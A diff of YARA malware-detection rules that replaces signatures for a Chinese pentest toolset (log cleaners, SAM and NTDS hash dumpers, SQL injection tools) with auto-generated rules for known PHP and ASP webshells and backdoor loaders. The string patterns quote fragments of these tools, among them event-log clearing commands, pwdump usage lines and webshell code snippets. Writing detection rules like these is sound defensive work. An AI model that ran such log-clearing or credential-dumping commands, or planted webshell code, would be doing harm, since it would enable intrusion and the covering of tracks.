-		logic_hash = "8c9be7e8cc04eba6b131acc3c85ac48d7663260a2e4064ad55ed8f40e0875cf4"
-		score = 70
+		hash = "0412b1e37f41ea0d002e4ed11608905f"
+		logic_hash = "47660cb71d6787683e51aa14fc0f4a9d6f1c59517b77bfe4135098a0020ded11"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "IP - %d; Login - %d; Password - %d; Combination - %d" fullword ascii
-		$s3 = "Create %d IP@Loginl;Password" fullword ascii
-		$s15 = "UBrute.com" fullword ascii
+		$s8 = "$err = \"<i>Your Name</i> Not Entered!</font></h2>Sorry, \\\"You"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 980KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Hkmjjiis6 : FILE
+rule SIGNATURE_BASE_FSO_S_Phvayv
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file hkmjjiis6.exe"
+		description = "Webshells Auto-generated - file phvayv.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "badf8224-4f09-57aa-ab16-0d70e0b3f88c"
-		date = "2015-06-23"
-		modified = "2023-01-27"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1701-L1718"
+		id = "07e027a6-01a5-5250-a35e-fbfef1449cfe"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7828-L7839"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4cbc6344c6712fa819683a4bd7b53f78ea4047d7"
-		logic_hash = "a087b9731444152b717e0fbae557004d94f3fb69a4ec65aa38b7a3dab3e3cddf"
-		score = 70
+		hash = "205ecda66c443083403efb1e5c7f7878"
+		logic_hash = "d0482607f7d9cf6c89963cb9b1f943fa0b80636e857e0fb044cd9a0b3f974deb"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s14 = "* FROM IIsWebInfo/r" fullword ascii
-		$s19 = "ltithread4ck/" ascii
-		$s20 = "LookupAcc=Sid#" fullword ascii
+		$s2 = "wrap=\"OFF\">XXXX</textarea></font><font face"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 175KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Clearlogs : FILE
+rule SIGNATURE_BASE_Byshell063_Ntboot
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file clearlogs.exe"
+		description = "Webshells Auto-generated - file ntboot.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bfbc339e-5530-5984-94de-be1002f09ca1"
-		date = "2015-06-23"
-		modified = "2023-01-27"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1720-L1736"
+		id = "7d1f39f6-04f1-51ee-b125-c35af8ae4c0c"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7840-L7854"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "490f3bc318f415685d7e32176088001679b0da1b"
-		logic_hash = "ed961d2850ba86743177976a4516e7d4a8b90b7e8f180c03f5dbbcc794ad1084"
-		score = 70
+		hash = "99b5f49db6d6d9a9faeffb29fd8e6d8c"
+		logic_hash = "2fdc930eacb87d02ebe69a2b64df4103bd0f3417a76f1b2922b3d4cd4c0dffe9"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "- http://ntsecurity.nu/toolbox/clearlogs/" ascii
-		$s4 = "Error: Unable to clear log - " fullword ascii
+		$s0 = "SYSTEM\\CurrentControlSet\\Services\\NtBoot"
+		$s1 = "Failure ... Access is Denied !"
+		$s2 = "Dumping Description to Registry..."
+		$s3 = "Opening Service .... Failure !"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 140KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_No_Net_Priv_Esc_Adduser : FILE
+rule SIGNATURE_BASE_FSO_S_Casus15_2
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file AddUser.dll"
+		description = "Webshells Auto-generated - file casus15.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0f99914c-9349-5870-a3e0-3a5079efdecf"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1738-L1754"
+		id = "d3f67fe9-a93f-504a-8b14-a815135d562f"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7855-L7866"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4c95046be6ae40aee69a433e9a47f824598db2d4"
-		logic_hash = "743e67e2aa95830034db1afda1f346c30467c7b59e030ed27415e5127013be74"
-		score = 70
+		hash = "8d155b4239d922367af5d0a1b89533a3"
+		logic_hash = "45820e0398cca8e75fc4acf6863d962a817afd95a4592acd4ac4a50029684220"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "PECompact2" fullword ascii
-		$s1 = "adduser" fullword ascii
-		$s5 = "OagaBoxA" fullword ascii
+		$s0 = "copy ( $dosya_gonder"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 115KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Injection : FILE
+rule SIGNATURE_BASE_Installer
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Injection.exe"
+		description = "Webshells Auto-generated - file installer.cmd"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8600c86f-0da1-5ddb-bae5-69358cf53e7c"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1756-L1771"
+		id = "681d8284-55e5-5316-a0d2-f4f13218df76"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7867-L7879"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3484ed16e6f9e0d603cbc5cb44e46b8b7e775d35"
-		logic_hash = "8de3e59bd118fbbf1a012c6bfb358dba7c8fb758e3ac17277f2ad3a92c0284ba"
-		score = 70
+		hash = "a507919ae701cf7e42fa441d3ad95f8f"
+		logic_hash = "73c1032313155ceb752fe2f94c8d242833127fe0443d7e3044fa1de2b2b7742b"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "http://127.0.0.1/6kbbs/bank.asp" fullword ascii
-		$s7 = "jmPost.asp" fullword wide
+		$s0 = "Restore Old Vanquish"
+		$s4 = "ReInstall Vanquish"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 220KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Sqlserver_Inject_Creaked : FILE
+rule SIGNATURE_BASE_FSO_S_Remview_2
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file SQLServer_inject_Creaked.exe"
+		description = "Webshells Auto-generated - file remview.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9a8a77c2-9e06-5694-8055-4480ab932520"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1773-L1788"
+		id = "8e0492e8-d683-5c2d-b1ce-6c8344b874af"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7880-L7892"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "af3c41756ec8768483a4cf59b2e639994426e2c2"
-		logic_hash = "2a7e913a4b7bb6c1270d862108eae7ed3998114b672ca7fa19bd0b199fc27dc2"
-		score = 70
+		hash = "b4a09911a5b23e00b55abe546ded691c"
+		logic_hash = "0a682431f7044e9a49c8dd4842a22c521e2a07d5df045b0a12449e3b3206716b"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "http://localhost/index.asp?id=2" fullword ascii
-		$s2 = "Email:zhaoxypass@yahoo.com.cn<br>" fullword ascii
+		$s0 = "<xmp>$out</"
+		$s1 = ".mm(\"Eval PHP code\")."
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 8110KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webscan_Webscan : FILE
+rule SIGNATURE_BASE_Felikspack3___PHP_Shells_R57
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file WebScan.exe"
+		description = "Webshells Auto-generated - file r57.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1545494b-9a74-5b2e-921c-e54dd5ac4b51"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1790-L1805"
+		id = "14092413-27a4-5b7d-9023-0b53b3d45a12"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7893-L7904"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a0b0e2422e0e9edb1aed6abb5d2e3d156b7c8204"
-		logic_hash = "a714fe90dce33180b8074e2c3a16fc1829ed2a7b387eb92aec8a147cff9e57a4"
-		score = 70
+		hash = "903908b77a266b855262cdbce81c3f72"
+		logic_hash = "8d0f3b2009594d4aa413c4794dca12e3c66a19974cc6d0b47cc3f5e2572a4c57"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "wwwscan.exe" fullword wide
-		$s2 = "WWWScan Gui" fullword wide
+		$s1 = "$sql = \"LOAD DATA INFILE \\\"\".$_POST['test3_file']."
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Gethashes_2 : FILE
+rule SIGNATURE_BASE_Hytop2006_Rar_Folder_2006X
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file GetHashes.exe"
+		description = "Webshells Auto-generated - file 2006X.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "31117d2e-caf1-58c9-8525-b40b73097928"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1807-L1823"
+		id = "bda89055-27f5-50b7-86a3-2c75a5f3eadc"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7905-L7917"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "35ae9ccba8d607d8c19a065cf553070c54b091d8"
-		logic_hash = "778fde2c59d4523142c0ac5b5c953c9eedbbf3c00b406541c00c1aa1f1a9cc58"
-		score = 70
+		hash = "cf3ee0d869dd36e775dfcaa788db8e4b"
+		logic_hash = "b71cf90900c7eae4caef57564292ca497a2c6c77e3de2994ba9e4cecae7f2697"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "GetHashes.exe <SAM registry file> [System key file]" fullword ascii
-		$s2 = "GetHashes.exe $Local" fullword ascii
-		$s3 = "The system key doesn't match SAM registry file!" fullword ascii
+		$s1 = "<input name=\"password\" type=\"password\" id=\"password\""
+		$s6 = "name=\"theAction\" type=\"text\" id=\"theAction\""
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_SUSP_Patcher_Keygen_Indicators_Jun15 : FILE
+rule SIGNATURE_BASE_FSO_S_Phvayv_2
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset"
+		description = "Webshells Auto-generated - file phvayv.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4dd65e4b-8178-5576-9740-b3c80a8127e2"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1825-L1841"
+		id = "8bd52f9b-a232-566d-90ab-4085933cdc65"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7918-L7929"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e32f5de730e324fb386f97b6da9ba500cf3a4f8d"
-		logic_hash = "07735c380cf34aaabd5cc0e1b38e32b3d4ad86b7bb184188d446df537f66775e"
-		score = 70
+		hash = "205ecda66c443083403efb1e5c7f7878"
+		logic_hash = "11418a11692412ccb309983bdadd9bda2b27b692c3282eb0386094e76c7ba1e0"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<description>Patch</description>" fullword ascii
-		$s2 = "\\dup2patcher.dll" ascii
-		$s3 = "load_patcher" fullword ascii
+		$s2 = "rows=\"24\" cols=\"122\" wrap=\"OFF\">XXXX</textarea></font><font"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 4000KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Tuoku_Script_Oracle_2 : FILE
+rule SIGNATURE_BASE_Elmaliseker
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file oracle.txt"
+		description = "Webshells Auto-generated - file elmaliseker.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b88a0faa-1616-5f1b-80dc-6e6a2f0cb671"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1843-L1858"
+		id = "7ecf3d5c-be91-579e-905b-5f2ad03a0e42"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7930-L7942"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "865dd591b552787eda18ee0ab604509bae18c197"
-		logic_hash = "627d81323266d67a2402367918b4f6e7277367c3eb027af57ac6966f2a49472c"
-		score = 70
+		hash = "ccf48af0c8c09bbd038e610a49c9862e"
+		logic_hash = "54c0b8e74a9b10fe54901c0595600af1dfc54abd3f710fc20ca87ca92236bb49"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "webshell" fullword ascii
-		$s1 = "Silic Group Hacker Army " fullword ascii
+		$s0 = "javascript:Command('Download'"
+		$s5 = "zombie_array=array("
 
 	condition:
-		filesize < 3KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Net_Packet_Capt : FILE
+rule SIGNATURE_BASE_Shelltools_G0T_Root_Resolve
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file net_packet_capt.exe"
+		description = "Webshells Auto-generated - file resolve.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "16e19be7-3805-5e2b-baa6-20554fb7a5cf"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1860-L1878"
+		id = "dcdb9952-63fc-57a7-ae17-ffe8ac4271f1"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7943-L7960"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2d45a2bd9e74cf14c1d93fff90c2b0665f109c52"
-		logic_hash = "b158199a27f1260da5f5c1a8e99bb1cc3d19fe2a10577cc5932f097ff39d4ef8"
-		score = 70
+		hash = "69bf9aa296238610a0e05f99b5540297"
+		logic_hash = "39d8ac274e94f13b5eb197be5827a95ac09df70793bd584c96b81983a565c1ce"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "(*.sfd)" fullword ascii
-		$s2 = "GetLaBA" fullword ascii
-		$s3 = "GAIsProcessorFeature" fullword ascii
-		$s4 = "- Gablto " ascii
-		$s5 = "PaneWyedit" fullword ascii
+		$s0 = "3^n6B(Ed3"
+		$s1 = "^uldn'Vt(x"
+		$s2 = "\\= uPKfp"
+		$s3 = "'r.axV<ad"
+		$s4 = "p,modoi$=sr("
+		$s5 = "DiamondC8S t"
+		$s6 = "`lQ9fX<ZvJW"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Cleaniislog : FILE
+rule SIGNATURE_BASE_FSO_S_Remexp
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file CleanIISLog.exe"
+		description = "Webshells Auto-generated - file RemExp.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3931ba63-faf5-5b44-879c-105cd2812712"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1880-L1894"
+		id = "48a262bf-7f48-5ed9-b043-80e9d563bf21"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7961-L7974"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "827cd898bfe8aa7e9aaefbe949d26298f9e24094"
-		logic_hash = "35b428d6178196b0dc6ac2ea3f0ee1dfbf6a98ead2356cb2a35d3d6b780538cc"
-		score = 70
+		hash = "b69670ecdbb40012c73686cd22696eeb"
+		logic_hash = "b9b966a89ab097494d7af90775bf124f1310c77145be67fa57ebdacd0164e3d0"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Usage: CleanIISLog <LogFile>|<.> <CleanIP>|<.>" fullword ascii
+		$s1 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=SubFolder.Name%>\"> <a href= \"<%=Request.Ser"
+		$s5 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f=<%=F"
+		$s6 = "<td bgcolor=\"<%=BgColor%>\" align=\"right\"><%=Attributes(SubFolder.Attributes)%></"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_HASH_Pwhash : FILE
+rule SIGNATURE_BASE_FSO_S_Tool
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file pwhash.exe"
+		description = "Webshells Auto-generated - file tool.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5d8c3648-a725-5f01-9800-b75b8c740cf1"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1896-L1911"
+		id = "ed744aa4-7a35-57d6-89bd-3286a21b50a0"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7975-L7986"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "689056588f95749f0382d201fac8f58bac393e98"
-		logic_hash = "a77ae11c35dac3cfb1a2970460d4883feed7fbd3e8a860fa7facaad7ddcd1182"
-		score = 70
+		hash = "3a1e1e889fdd974a130a6a767b42655b"
+		logic_hash = "a3449aca3124aa4d920d78e5e674ddd9d8a181b0ce0143032352a69dfdbcad2d"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Example: quarks-pwdump.exe --dump-hash-domain --with-history" fullword ascii
-		$s2 = "quarks-pwdump.exe <options> <NTDS file>" fullword ascii
+		$s7 = "\"\"%windir%\\\\calc.exe\"\")"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Cleaner_Cl_2 : FILE
+rule SIGNATURE_BASE_Felikspack3___PHP_Shells_2005
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file cl.exe"
+		description = "Webshells Auto-generated - file 2005.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9aa36c0a-9e0f-5274-bebe-9179d81b05f7"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1913-L1928"
+		id = "91d278d5-e9ec-5a28-9a54-4549b4f0cd07"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7987-L7999"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "523084e8975b16e255b56db9af0f9eecf174a2dd"
-		logic_hash = "865354152f8441009aaad9022f64c3a014c4df0549b648d66959df56893ab98a"
-		score = 70
+		hash = "97f2552c2fafc0b2eb467ee29cc803c8"
+		logic_hash = "4d04174b23c9057acf2618c01cd702eaaec2d3508a8c25dd87fdd320c076a3b1"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "cl -eventlog All/Application/System/Security" fullword ascii
-		$s1 = "clear iislog error!" fullword ascii
+		$s0 = "window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp"
+		$s3 = "<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Sqlmap_Python_Run : FILE
+rule SIGNATURE_BASE_Byloader
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Run.exe"
+		description = "Webshells Auto-generated - file byloader.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "308d929a-0f38-5db4-92c2-2a7bf25bb64f"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1930-L1946"
+		id = "24940e4b-06eb-548d-9e14-1a8f9c864bd3"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8000-L8015"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a51479a1c589f17c77d22f6cf90b97011c33145f"
-		logic_hash = "86d53a06e2f71b7ce7785c4c8ac017a4552b40c16d64474db4e22dbe1afd9e52"
-		score = 70
+		hash = "0f0d6dc26055653f5844ded906ce52df"
+		logic_hash = "66c900e4bc771fb23d7623e57ad51edaa95696c2e31554720582f3e33a1b2e25"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = ".\\Run.log" fullword ascii
-		$s2 = "[root@Hacker~]# Sqlmap " fullword ascii
-		$s3 = "%sSqlmap %s" fullword ascii
+		$s0 = "SYSTEM\\CurrentControlSet\\Services\\NtfsChk"
+		$s1 = "Failure ... Access is Denied !"
+		$s2 = "NTFS Disk Driver Checking Service"
+		$s3 = "Dumping Description to Registry..."
+		$s4 = "Opening Service .... Failure !"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Saminside : FILE
+rule SIGNATURE_BASE_Shelltools_G0T_Root_Fport
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file SAMInside.exe"
+		description = "Webshells Auto-generated - file Fport.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c5ac9f0a-d1af-59c3-9c13-91153180f3d8"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1948-L1963"
+		id = "664e7b19-4d0b-5062-97d2-0eb34869024d"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8016-L8028"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "707ba507f9a74d591f4f2e2f165ff9192557d6dd"
-		logic_hash = "8f095a554121e16b63fdd8d47d957665aed7a2a5885813fa78bc4cee3b8923d3"
-		score = 70
+		hash = "dbb75488aa2fa22ba6950aead1ef30d5"
